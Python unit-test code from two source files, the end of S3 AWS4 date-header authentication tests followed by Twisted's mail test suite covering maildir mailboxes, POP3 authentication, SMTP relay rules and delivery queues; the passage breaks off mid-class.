def test_bucket_create_bad_date_before_today_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2010 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date in past')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_before_today_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '20100707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date in future')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_after_today_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 2030 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date in future')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_after_today_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '20300707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('RequestTimeTooSkewed', 'SignatureDoesNotMatch')
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/date before epoch')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_date_before_epoch_aws4():
check_aws4_support()
_add_custom_headers({'Date': 'Tue, 07 Jul 1950 21:53:04 GMT'})
get_new_bucket()
@tag('auth_aws4')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/x-amz-date before epoch')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_amz_date_before_epoch_aws4():
check_aws4_support()
_add_custom_headers({'X-Amz-Date': '19500707T215304Z'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
|
candy7393/VTK
|
refs/heads/master
|
ThirdParty/Twisted/twisted/mail/test/test_mail.py
|
26
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for large portions of L{twisted.mail}.
"""
import os
import errno
import shutil
import pickle
import StringIO
import rfc822
import tempfile
import signal
from hashlib import md5
from zope.interface.verify import verifyClass
from zope.interface import Interface, implements
from twisted.trial import unittest
from twisted.mail import smtp
from twisted.mail import pop3
from twisted.names import dns
from twisted.internet import protocol
from twisted.internet import defer
from twisted.internet.defer import Deferred
from twisted.internet import reactor
from twisted.internet import interfaces
from twisted.internet import task
from twisted.internet.error import DNSLookupError, CannotListenError
from twisted.internet.error import ProcessDone, ProcessTerminated
from twisted.internet import address
from twisted.python import failure
from twisted.python.filepath import FilePath
from twisted import mail
import twisted.mail.mail
import twisted.mail.maildir
import twisted.mail.relay
import twisted.mail.relaymanager
import twisted.mail.protocols
import twisted.mail.alias
from twisted.names.error import DNSNameError
from twisted.names.dns import RRHeader, Record_CNAME, Record_MX
from twisted import cred
import twisted.cred.credentials
import twisted.cred.checkers
import twisted.cred.portal
from twisted.test.proto_helpers import LineSendingProtocol
class DomainWithDefaultsTestCase(unittest.TestCase):
def testMethods(self):
d = dict([(x, x + 10) for x in range(10)])
d = mail.mail.DomainWithDefaultDict(d, 'Default')
self.assertEqual(len(d), 10)
self.assertEqual(list(iter(d)), range(10))
self.assertEqual(list(d.iterkeys()), list(iter(d)))
items = list(d.iteritems())
items.sort()
self.assertEqual(items, [(x, x + 10) for x in range(10)])
values = list(d.itervalues())
values.sort()
self.assertEqual(values, range(10, 20))
items = d.items()
items.sort()
self.assertEqual(items, [(x, x + 10) for x in range(10)])
values = d.values()
values.sort()
self.assertEqual(values, range(10, 20))
for x in range(10):
self.assertEqual(d[x], x + 10)
self.assertEqual(d.get(x), x + 10)
self.failUnless(x in d)
self.failUnless(d.has_key(x))
del d[2], d[4], d[6]
self.assertEqual(len(d), 7)
self.assertEqual(d[2], 'Default')
self.assertEqual(d[4], 'Default')
self.assertEqual(d[6], 'Default')
d.update({'a': None, 'b': (), 'c': '*'})
self.assertEqual(len(d), 10)
self.assertEqual(d['a'], None)
self.assertEqual(d['b'], ())
self.assertEqual(d['c'], '*')
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(d.setdefault('key', 'value'), 'value')
self.assertEqual(d['key'], 'value')
self.assertEqual(d.popitem(), ('key', 'value'))
self.assertEqual(len(d), 0)
dcopy = d.copy()
self.assertEqual(d.domains, dcopy.domains)
self.assertEqual(d.default, dcopy.default)
def _stringificationTest(self, stringifier):
"""
Assert that the class name of a L{mail.mail.DomainWithDefaultDict}
instance and the string-formatted underlying domain dictionary both
appear in the string produced by the given string-returning function.
@type stringifier: one-argument callable
@param stringifier: either C{str} or C{repr}, to be used to get a
string to make assertions against.
"""
domain = mail.mail.DomainWithDefaultDict({}, 'Default')
self.assertIn(domain.__class__.__name__, stringifier(domain))
domain['key'] = 'value'
self.assertIn(str({'key': 'value'}), stringifier(domain))
def test_str(self):
"""
L{DomainWithDefaultDict.__str__} should return a string including
the class name and the domain mapping held by the instance.
"""
self._stringificationTest(str)
def test_repr(self):
"""
L{DomainWithDefaultDict.__repr__} should return a string including
the class name and the domain mapping held by the instance.
"""
self._stringificationTest(repr)
class BounceTestCase(unittest.TestCase):
def setUp(self):
self.domain = mail.mail.BounceDomain()
def testExists(self):
self.assertRaises(smtp.AddressError, self.domain.exists, "any user")
def testRelay(self):
self.assertEqual(
self.domain.willRelay("random q emailer", "protocol"),
False
)
def testAddUser(self):
self.domain.addUser("bob", "password")
self.assertRaises(smtp.SMTPBadRcpt, self.domain.exists, "bob")
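# FileMessage writes received lines to a temporary file and renames it to its
# final name once the end of the message is received; these tests cover both
# the successful and the interrupted delivery paths.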
class FileMessageTestCase(unittest.TestCase):
def setUp(self):
self.name = "fileMessage.testFile"
self.final = "final.fileMessage.testFile"
self.f = file(self.name, 'w')
self.fp = mail.mail.FileMessage(self.f, self.name, self.final)
def tearDown(self):
try:
self.f.close()
except:
pass
try:
os.remove(self.name)
except:
pass
try:
os.remove(self.final)
except:
pass
def testFinalName(self):
return self.fp.eomReceived().addCallback(self._cbFinalName)
def _cbFinalName(self, result):
self.assertEqual(result, self.final)
self.failUnless(self.f.closed)
self.failIf(os.path.exists(self.name))
def testContents(self):
contents = "first line\nsecond line\nthird line\n"
for line in contents.splitlines():
self.fp.lineReceived(line)
self.fp.eomReceived()
self.assertEqual(file(self.final).read(), contents)
def testInterrupted(self):
contents = "first line\nsecond line\n"
for line in contents.splitlines():
self.fp.lineReceived(line)
self.fp.connectionLost()
self.failIf(os.path.exists(self.name))
self.failIf(os.path.exists(self.final))
class MailServiceTestCase(unittest.TestCase):
def setUp(self):
self.service = mail.mail.MailService()
def testFactories(self):
f = self.service.getPOP3Factory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), pop3.POP3)
f = self.service.getSMTPFactory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), smtp.SMTP)
f = self.service.getESMTPFactory()
self.failUnless(isinstance(f, protocol.ServerFactory))
self.failUnless(f.buildProtocol(('127.0.0.1', 12345)), smtp.ESMTP)
def testPortals(self):
o1 = object()
o2 = object()
self.service.portals['domain'] = o1
self.service.portals[''] = o2
self.failUnless(self.service.lookupPortal('domain') is o1)
self.failUnless(self.service.defaultPortal() is o2)
class StringListMailboxTests(unittest.TestCase):
"""
Tests for L{StringListMailbox}, an in-memory only implementation of
L{pop3.IMailbox}.
"""
def test_listOneMessage(self):
"""
L{StringListMailbox.listMessages} returns the length of the message at
the offset into the mailbox passed to it.
"""
mailbox = mail.maildir.StringListMailbox(["abc", "ab", "a"])
self.assertEqual(mailbox.listMessages(0), 3)
self.assertEqual(mailbox.listMessages(1), 2)
self.assertEqual(mailbox.listMessages(2), 1)
def test_listAllMessages(self):
"""
L{StringListMailbox.listMessages} returns a list of the lengths of all
messages if not passed an index.
"""
mailbox = mail.maildir.StringListMailbox(["a", "abc", "ab"])
self.assertEqual(mailbox.listMessages(), [1, 3, 2])
def test_getMessage(self):
"""
L{StringListMailbox.getMessage} returns a file-like object from which
the contents of the message at the given offset into the mailbox can be
read.
"""
mailbox = mail.maildir.StringListMailbox(["foo", "real contents"])
self.assertEqual(mailbox.getMessage(1).read(), "real contents")
def test_getUidl(self):
"""
L{StringListMailbox.getUidl} returns a unique identifier for the
message at the given offset into the mailbox.
"""
mailbox = mail.maildir.StringListMailbox(["foo", "bar"])
self.assertNotEqual(mailbox.getUidl(0), mailbox.getUidl(1))
def test_deleteMessage(self):
"""
L{StringListMailbox.deleteMessage} marks a message for deletion causing
further requests for its length to return 0.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
self.assertEqual(mailbox.listMessages(0), 0)
self.assertEqual(mailbox.listMessages(), [0])
def test_undeleteMessages(self):
"""
L{StringListMailbox.undeleteMessages} causes any messages marked for
deletion to be returned to their original state.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
mailbox.undeleteMessages()
self.assertEqual(mailbox.listMessages(0), 3)
self.assertEqual(mailbox.listMessages(), [3])
def test_sync(self):
"""
L{StringListMailbox.sync} causes any messages marked for deletion to
be permanently deleted.
"""
mailbox = mail.maildir.StringListMailbox(["foo"])
mailbox.deleteMessage(0)
mailbox.sync()
mailbox.undeleteMessages()
self.assertEqual(mailbox.listMessages(0), 0)
self.assertEqual(mailbox.listMessages(), [0])
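# Subclass of the maildir append task whose _openstate/_writestate/_renamestate
# flags let tests simulate os.open, os.write, and os.rename failures while a
# message is being appended to the mailbox.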
class FailingMaildirMailboxAppendMessageTask(mail.maildir._MaildirMailboxAppendMessageTask):
_openstate = True
_writestate = True
_renamestate = True
def osopen(self, fn, attr, mode):
if self._openstate:
return os.open(fn, attr, mode)
else:
raise OSError(errno.EPERM, "Faked Permission Problem")
def oswrite(self, fh, data):
if self._writestate:
return os.write(fh, data)
else:
raise OSError(errno.ENOSPC, "Faked Space problem")
def osrename(self, oldname, newname):
if self._renamestate:
return os.rename(oldname, newname)
else:
raise OSError(errno.EPERM, "Faked Permission Problem")
class _AppendTestMixin(object):
"""
Mixin for L{MaildirMailbox.appendMessage} test cases which defines a helper
for serially appending multiple messages to a mailbox.
"""
def _appendMessages(self, mbox, messages):
"""
Deliver the given messages one at a time. Delivery is serialized to
guarantee a predictable order in the mailbox (overlapped message delivery
makes no guarantees about which message will appear first).
"""
results = []
def append():
for m in messages:
d = mbox.appendMessage(m)
d.addCallback(results.append)
yield d
d = task.cooperate(append()).whenDone()
d.addCallback(lambda ignored: results)
return d
class MaildirAppendStringTestCase(unittest.TestCase, _AppendTestMixin):
"""
Tests for L{MaildirMailbox.appendMessage} when invoked with a C{str}.
"""
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def _append(self, ignored, mbox):
d = mbox.appendMessage('TEST')
return self.assertFailure(d, Exception)
def _setState(self, ignored, mbox, rename=None, write=None, open=None):
"""
Change the behavior of future C{rename}, C{write}, or C{open} calls made
by the mailbox C{mbox}.
@param rename: If not C{None}, a new value for the C{_renamestate}
attribute of the mailbox's append factory. The original value will
be restored at the end of the test.
@param write: Like C{rename}, but for the C{_writestate} attribute.
@param open: Like C{rename}, but for the C{_openstate} attribute.
"""
if rename is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_renamestate',
mbox.AppendFactory._renamestate)
mbox.AppendFactory._renamestate = rename
if write is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_writestate',
mbox.AppendFactory._writestate)
mbox.AppendFactory._writestate = write
if open is not None:
self.addCleanup(
setattr, mbox.AppendFactory, '_openstate',
mbox.AppendFactory._openstate)
mbox.AppendFactory._openstate = open
def test_append(self):
"""
L{MaildirMailbox.appendMessage} returns a L{Deferred} which fires when
the message has been added to the end of the mailbox.
"""
mbox = mail.maildir.MaildirMailbox(self.d)
mbox.AppendFactory = FailingMaildirMailboxAppendMessageTask
d = self._appendMessages(mbox, ["X" * i for i in range(1, 11)])
d.addCallback(self.assertEqual, [None] * 10)
d.addCallback(self._cbTestAppend, mbox)
return d
def _cbTestAppend(self, ignored, mbox):
"""
Check that the mailbox has the expected number (ten) of messages in it,
and that each has the expected contents, and that they are in the same
order as that in which they were appended.
"""
self.assertEqual(len(mbox.listMessages()), 10)
self.assertEqual(
[len(mbox.getMessage(i).read()) for i in range(10)],
range(1, 11))
# Exercise the failure points from last to first: rename, then write, then open.
self._setState(None, mbox, rename=False)
d = self._append(None, mbox)
d.addCallback(self._setState, mbox, rename=True, write=False)
d.addCallback(self._append, mbox)
d.addCallback(self._setState, mbox, write=True, open=False)
d.addCallback(self._append, mbox)
d.addCallback(self._setState, mbox, open=True)
return d
class MaildirAppendFileTestCase(unittest.TestCase, _AppendTestMixin):
"""
Tests for L{MaildirMailbox.appendMessage} when invoked with a file-like object.
"""
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def test_append(self):
"""
L{MaildirMailbox.appendMessage} returns a L{Deferred} which fires when
the message has been added to the end of the mailbox.
"""
mbox = mail.maildir.MaildirMailbox(self.d)
messages = []
for i in xrange(1, 11):
temp = tempfile.TemporaryFile()
temp.write("X" * i)
temp.seek(0, 0)
messages.append(temp)
self.addCleanup(temp.close)
d = self._appendMessages(mbox, messages)
d.addCallback(self._cbTestAppend, mbox)
return d
def _cbTestAppend(self, result, mbox):
"""
Check that the mailbox has the expected number (ten) of messages in it,
and that each has the expected contents, and that they are in the same
order as that in which they were appended.
"""
self.assertEqual(len(mbox.listMessages()), 10)
self.assertEqual(
[len(mbox.getMessage(i).read()) for i in range(10)],
range(1, 11))
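# Exercises maildir directory initialization, the unique message name
# generator, and the MaildirMailbox message API against a real temporary
# directory tree.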
class MaildirTestCase(unittest.TestCase):
def setUp(self):
self.d = self.mktemp()
mail.maildir.initializeMaildir(self.d)
def tearDown(self):
shutil.rmtree(self.d)
def testInitializer(self):
d = self.d
trash = os.path.join(d, '.Trash')
self.failUnless(os.path.exists(d) and os.path.isdir(d))
self.failUnless(os.path.exists(os.path.join(d, 'new')))
self.failUnless(os.path.exists(os.path.join(d, 'cur')))
self.failUnless(os.path.exists(os.path.join(d, 'tmp')))
self.failUnless(os.path.isdir(os.path.join(d, 'new')))
self.failUnless(os.path.isdir(os.path.join(d, 'cur')))
self.failUnless(os.path.isdir(os.path.join(d, 'tmp')))
self.failUnless(os.path.exists(os.path.join(trash, 'new')))
self.failUnless(os.path.exists(os.path.join(trash, 'cur')))
self.failUnless(os.path.exists(os.path.join(trash, 'tmp')))
self.failUnless(os.path.isdir(os.path.join(trash, 'new')))
self.failUnless(os.path.isdir(os.path.join(trash, 'cur')))
self.failUnless(os.path.isdir(os.path.join(trash, 'tmp')))
def test_nameGenerator(self):
"""
Each call to L{_MaildirNameGenerator.generate} returns a unique
string suitable for use as the basename of a new message file. The
names are ordered such that those generated earlier sort less than
those generated later.
"""
clock = task.Clock()
clock.advance(0.05)
generator = mail.maildir._MaildirNameGenerator(clock)
firstName = generator.generate()
clock.advance(0.05)
secondName = generator.generate()
self.assertTrue(firstName < secondName)
def test_mailbox(self):
"""
Exercise the methods of L{IMailbox} as implemented by
L{MaildirMailbox}.
"""
j = os.path.join
n = mail.maildir._generateMaildirName
msgs = [j(b, n()) for b in ('cur', 'new') for x in range(5)]
# Toss a few files into the mailbox
i = 1
for f in msgs:
fObj = file(j(self.d, f), 'w')
fObj.write('x' * i)
fObj.close()
i = i + 1
mb = mail.maildir.MaildirMailbox(self.d)
self.assertEqual(mb.listMessages(), range(1, 11))
self.assertEqual(mb.listMessages(1), 2)
self.assertEqual(mb.listMessages(5), 6)
self.assertEqual(mb.getMessage(6).read(), 'x' * 7)
self.assertEqual(mb.getMessage(1).read(), 'x' * 2)
d = {}
for i in range(10):
u = mb.getUidl(i)
self.failIf(u in d)
d[u] = None
p, f = os.path.split(msgs[5])
mb.deleteMessage(5)
self.assertEqual(mb.listMessages(5), 0)
self.failUnless(os.path.exists(j(self.d, '.Trash', 'cur', f)))
self.failIf(os.path.exists(j(self.d, msgs[5])))
mb.undeleteMessages()
self.assertEqual(mb.listMessages(5), 6)
self.failIf(os.path.exists(j(self.d, '.Trash', 'cur', f)))
self.failUnless(os.path.exists(j(self.d, msgs[5])))
class AbstractMaildirDomainTestCase(unittest.TestCase):
"""
Tests for L{twisted.mail.maildir.AbstractMaildirDomain}.
"""
def test_interface(self):
"""
L{maildir.AbstractMaildirDomain} implements L{mail.IAliasableDomain}.
"""
verifyClass(mail.mail.IAliasableDomain,
mail.maildir.AbstractMaildirDomain)
class MaildirDirdbmDomainTestCase(unittest.TestCase):
"""
Tests for L{MaildirDirdbmDomain}.
"""
def setUp(self):
"""
Create a temporary L{MaildirDirdbmDomain} and parent
L{MailService} before running each test.
"""
self.P = self.mktemp()
self.S = mail.mail.MailService()
self.D = mail.maildir.MaildirDirdbmDomain(self.S, self.P)
def tearDown(self):
"""
Remove the temporary C{maildir} directory when the test has
finished.
"""
shutil.rmtree(self.P)
def test_addUser(self):
"""
L{MaildirDirdbmDomain.addUser} accepts a user and password
argument. It stores those in a C{dbm} dictionary
attribute and creates a directory for each user.
"""
toAdd = (('user1', 'pwd1'), ('user2', 'pwd2'), ('user3', 'pwd3'))
for (u, p) in toAdd:
self.D.addUser(u, p)
for (u, p) in toAdd:
self.failUnless(u in self.D.dbm)
self.assertEqual(self.D.dbm[u], p)
self.failUnless(os.path.exists(os.path.join(self.P, u)))
def test_credentials(self):
"""
        L{MaildirDirdbmDomain.getCredentialsCheckers} initializes and
        returns one L{ICredentialsChecker} provider by default.
"""
creds = self.D.getCredentialsCheckers()
self.assertEqual(len(creds), 1)
self.failUnless(cred.checkers.ICredentialsChecker.providedBy(creds[0]))
self.failUnless(cred.credentials.IUsernamePassword in creds[0].credentialInterfaces)
def test_requestAvatar(self):
"""
L{MaildirDirdbmDomain.requestAvatar} raises L{NotImplementedError}
unless it is supplied with an L{pop3.IMailbox} interface.
When called with an L{pop3.IMailbox}, it returns a 3-tuple
containing L{pop3.IMailbox}, an implementation of that interface
and a NOOP callable.
"""
class ISomething(Interface):
pass
self.D.addUser('user', 'password')
self.assertRaises(
NotImplementedError,
self.D.requestAvatar, 'user', None, ISomething
)
t = self.D.requestAvatar('user', None, pop3.IMailbox)
self.assertEqual(len(t), 3)
self.failUnless(t[0] is pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(t[1]))
t[2]()
def test_requestAvatarId(self):
"""
L{DirdbmDatabase.requestAvatarId} raises L{UnauthorizedLogin} if
supplied with invalid user credentials.
When called with valid credentials, L{requestAvatarId} returns
the username associated with the supplied credentials.
"""
self.D.addUser('user', 'password')
database = self.D.getCredentialsCheckers()[0]
creds = cred.credentials.UsernamePassword('user', 'wrong password')
self.assertRaises(
cred.error.UnauthorizedLogin,
database.requestAvatarId, creds
)
creds = cred.credentials.UsernamePassword('user', 'password')
self.assertEqual(database.requestAvatarId(creds), 'user')
def test_userDirectory(self):
"""
L{MaildirDirdbmDomain.userDirectory} is supplied with a user name
and returns the path to that user's maildir subdirectory.
Calling L{MaildirDirdbmDomain.userDirectory} with a
non-existent user returns the 'postmaster' directory if there
is a postmaster or returns L{None} if there is no postmaster.
"""
self.D.addUser('user', 'password')
self.assertEqual(self.D.userDirectory('user'),
os.path.join(self.D.root, 'user'))
self.D.postmaster = False
self.assertIdentical(self.D.userDirectory('nouser'), None)
self.D.postmaster = True
self.assertEqual(self.D.userDirectory('nouser'),
os.path.join(self.D.root, 'postmaster'))
class StubAliasableDomain(object):
"""
Minimal testable implementation of IAliasableDomain.
"""
implements(mail.mail.IAliasableDomain)
def exists(self, user):
"""
No test coverage for invocations of this method on domain objects,
so we just won't implement it.
"""
raise NotImplementedError()
def addUser(self, user, password):
"""
No test coverage for invocations of this method on domain objects,
so we just won't implement it.
"""
raise NotImplementedError()
def getCredentialsCheckers(self):
"""
This needs to succeed in order for other tests to complete
successfully, but we don't actually assert anything about its
behavior. Return an empty list. Sometime later we should return
something else and assert that a portal got set up properly.
"""
return []
def setAliasGroup(self, aliases):
"""
Just record the value so the test can check it later.
"""
self.aliasGroup = aliases
class ServiceDomainTestCase(unittest.TestCase):
def setUp(self):
self.S = mail.mail.MailService()
self.D = mail.protocols.DomainDeliveryBase(self.S, None)
self.D.service = self.S
self.D.protocolName = 'TEST'
self.D.host = 'hostname'
self.tmpdir = self.mktemp()
domain = mail.maildir.MaildirDirdbmDomain(self.S, self.tmpdir)
domain.addUser('user', 'password')
self.S.addDomain('test.domain', domain)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testAddAliasableDomain(self):
"""
Test that adding an IAliasableDomain to a mail service properly sets
up alias group references and such.
"""
aliases = object()
domain = StubAliasableDomain()
self.S.aliases = aliases
self.S.addDomain('example.com', domain)
self.assertIdentical(domain.aliasGroup, aliases)
def testReceivedHeader(self):
hdr = self.D.receivedHeader(
('remotehost', '123.232.101.234'),
smtp.Address('<someguy@somplace>'),
['[email protected]']
)
fp = StringIO.StringIO(hdr)
m = rfc822.Message(fp)
self.assertEqual(len(m.items()), 1)
self.assertIn('Received', m)
def testValidateTo(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return defer.maybeDeferred(self.D.validateTo, user
).addCallback(self._cbValidateTo
)
def _cbValidateTo(self, result):
self.failUnless(callable(result))
def testValidateToBadUsername(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return self.assertFailure(
defer.maybeDeferred(self.D.validateTo, user),
smtp.SMTPBadRcpt)
def testValidateToBadDomain(self):
user = smtp.User('[email protected]', 'helo', None, 'wherever@whatever')
return self.assertFailure(
defer.maybeDeferred(self.D.validateTo, user),
smtp.SMTPBadRcpt)
def testValidateFrom(self):
helo = ('hostname', '127.0.0.1')
origin = smtp.Address('<user@hostname>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
helo = ('hostname', '1.2.3.4')
origin = smtp.Address('<user@hostname>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
helo = ('hostname', '1.2.3.4')
origin = smtp.Address('<>')
self.failUnless(self.D.validateFrom(helo, origin) is origin)
self.assertRaises(
smtp.SMTPBadSender,
self.D.validateFrom, None, origin
)
class VirtualPOP3TestCase(unittest.TestCase):
def setUp(self):
self.tmpdir = self.mktemp()
self.S = mail.mail.MailService()
self.D = mail.maildir.MaildirDirdbmDomain(self.S, self.tmpdir)
self.D.addUser('user', 'password')
self.S.addDomain('test.domain', self.D)
portal = cred.portal.Portal(self.D)
map(portal.registerChecker, self.D.getCredentialsCheckers())
self.S.portals[''] = self.S.portals['test.domain'] = portal
self.P = mail.protocols.VirtualPOP3()
self.P.service = self.S
self.P.magic = '<unit test magic>'
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testAuthenticateAPOP(self):
resp = md5(self.P.magic + 'password').hexdigest()
return self.P.authenticateUserAPOP('user', resp
).addCallback(self._cbAuthenticateAPOP
)
def _cbAuthenticateAPOP(self, result):
self.assertEqual(len(result), 3)
self.assertEqual(result[0], pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(result[1]))
result[2]()
def testAuthenticateIncorrectUserAPOP(self):
resp = md5(self.P.magic + 'password').hexdigest()
return self.assertFailure(
self.P.authenticateUserAPOP('resu', resp),
cred.error.UnauthorizedLogin)
def testAuthenticateIncorrectResponseAPOP(self):
resp = md5('wrong digest').hexdigest()
return self.assertFailure(
self.P.authenticateUserAPOP('user', resp),
cred.error.UnauthorizedLogin)
def testAuthenticatePASS(self):
return self.P.authenticateUserPASS('user', 'password'
).addCallback(self._cbAuthenticatePASS
)
def _cbAuthenticatePASS(self, result):
self.assertEqual(len(result), 3)
self.assertEqual(result[0], pop3.IMailbox)
self.failUnless(pop3.IMailbox.providedBy(result[1]))
result[2]()
def testAuthenticateBadUserPASS(self):
return self.assertFailure(
self.P.authenticateUserPASS('resu', 'password'),
cred.error.UnauthorizedLogin)
def testAuthenticateBadPasswordPASS(self):
return self.assertFailure(
self.P.authenticateUserPASS('user', 'wrong password'),
cred.error.UnauthorizedLogin)
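# Stub subclass that skips smtp.User.__init__ so tests can hand-assign only
# the attributes they need (orig, dest, protocol).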
class empty(smtp.User):
def __init__(self):
pass
class RelayTestCase(unittest.TestCase):
def testExists(self):
service = mail.mail.MailService()
domain = mail.relay.DomainQueuer(service)
doRelay = [
address.UNIXAddress('/var/run/mail-relay'),
address.IPv4Address('TCP', '127.0.0.1', 12345),
]
dontRelay = [
address.IPv4Address('TCP', '192.168.2.1', 62),
address.IPv4Address('TCP', '1.2.3.4', 1943),
]
for peer in doRelay:
user = empty()
user.orig = 'user@host'
user.dest = 'tsoh@resu'
user.protocol = empty()
user.protocol.transport = empty()
user.protocol.transport.getPeer = lambda: peer
self.failUnless(callable(domain.exists(user)))
for peer in dontRelay:
user = empty()
user.orig = 'some@place'
user.protocol = empty()
user.protocol.transport = empty()
user.protocol.transport.getPeer = lambda: peer
user.dest = 'who@cares'
self.assertRaises(smtp.SMTPBadRcpt, domain.exists, user)
class RelayerTestCase(unittest.TestCase):
def setUp(self):
self.tmpdir = self.mktemp()
os.mkdir(self.tmpdir)
self.messageFiles = []
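        # Each relayable message is stored as two files: '<name>-H' holds the
        # pickled envelope ([from, to]) and '<name>-D' holds the message body
        # (here just the path string).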
for i in range(10):
name = os.path.join(self.tmpdir, 'body-%d' % (i,))
f = file(name + '-H', 'w')
pickle.dump(['from-%d' % (i,), 'to-%d' % (i,)], f)
f.close()
f = file(name + '-D', 'w')
f.write(name)
f.seek(0, 0)
self.messageFiles.append(name)
self.R = mail.relay.RelayerMixin()
self.R.loadMessages(self.messageFiles)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testMailFrom(self):
for i in range(10):
self.assertEqual(self.R.getMailFrom(), 'from-%d' % (i,))
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailFrom(), None)
def testMailTo(self):
for i in range(10):
self.assertEqual(self.R.getMailTo(), ['to-%d' % (i,)])
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailTo(), None)
def testMailData(self):
for i in range(10):
name = os.path.join(self.tmpdir, 'body-%d' % (i,))
self.assertEqual(self.R.getMailData().read(), name)
self.R.sentMail(250, None, None, None, None)
self.assertEqual(self.R.getMailData(), None)
class Manager:
def __init__(self):
self.success = []
self.failure = []
self.done = []
def notifySuccess(self, factory, message):
self.success.append((factory, message))
def notifyFailure(self, factory, message):
self.failure.append((factory, message))
def notifyDone(self, factory):
self.done.append(factory)
class ManagedRelayerTestCase(unittest.TestCase):
def setUp(self):
self.manager = Manager()
self.messages = range(0, 20, 2)
self.factory = object()
self.relay = mail.relaymanager.ManagedRelayerMixin(self.manager)
self.relay.messages = self.messages[:]
self.relay.names = self.messages[:]
self.relay.factory = self.factory
def testSuccessfulSentMail(self):
for i in self.messages:
self.relay.sentMail(250, None, None, None, None)
self.assertEqual(
self.manager.success,
[(self.factory, m) for m in self.messages]
)
def testFailedSentMail(self):
for i in self.messages:
self.relay.sentMail(550, None, None, None, None)
self.assertEqual(
self.manager.failure,
[(self.factory, m) for m in self.messages]
)
def testConnectionLost(self):
self.relay.connectionLost(failure.Failure(Exception()))
self.assertEqual(self.manager.done, [self.factory])
class DirectoryQueueTestCase(unittest.TestCase):
def setUp(self):
# This is almost a test case itself.
self.tmpdir = self.mktemp()
os.mkdir(self.tmpdir)
self.queue = mail.relaymanager.Queue(self.tmpdir)
self.queue.noisy = False
for m in range(25):
hdrF, msgF = self.queue.createNewMessage()
pickle.dump(['header', m], hdrF)
hdrF.close()
msgF.lineReceived('body: %d' % (m,))
msgF.eomReceived()
self.queue.readDirectory()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testWaiting(self):
self.failUnless(self.queue.hasWaiting())
self.assertEqual(len(self.queue.getWaiting()), 25)
waiting = self.queue.getWaiting()
self.queue.setRelaying(waiting[0])
self.assertEqual(len(self.queue.getWaiting()), 24)
self.queue.setWaiting(waiting[0])
self.assertEqual(len(self.queue.getWaiting()), 25)
def testRelaying(self):
for m in self.queue.getWaiting():
self.queue.setRelaying(m)
self.assertEqual(
len(self.queue.getRelayed()),
25 - len(self.queue.getWaiting())
)
self.failIf(self.queue.hasWaiting())
relayed = self.queue.getRelayed()
self.queue.setWaiting(relayed[0])
self.assertEqual(len(self.queue.getWaiting()), 1)
self.assertEqual(len(self.queue.getRelayed()), 24)
def testDone(self):
msg = self.queue.getWaiting()[0]
self.queue.setRelaying(msg)
self.queue.done(msg)
self.assertEqual(len(self.queue.getWaiting()), 24)
self.assertEqual(len(self.queue.getRelayed()), 0)
self.failIf(msg in self.queue.getWaiting())
self.failIf(msg in self.queue.getRelayed())
def testEnvelope(self):
envelopes = []
for msg in self.queue.getWaiting():
envelopes.append(self.queue.getEnvelope(msg))
envelopes.sort()
for i in range(25):
self.assertEqual(
envelopes.pop(0),
['header', i]
)
from twisted.names import server
from twisted.names import client
from twisted.names import common
class TestAuthority(common.ResolverBase):
def __init__(self):
common.ResolverBase.__init__(self)
self.addresses = {}
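        # Maps a domain name to the list of exchange hostnames that _lookup()
        # below will return for MX queries against that domain.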
def _lookup(self, name, cls, type, timeout = None):
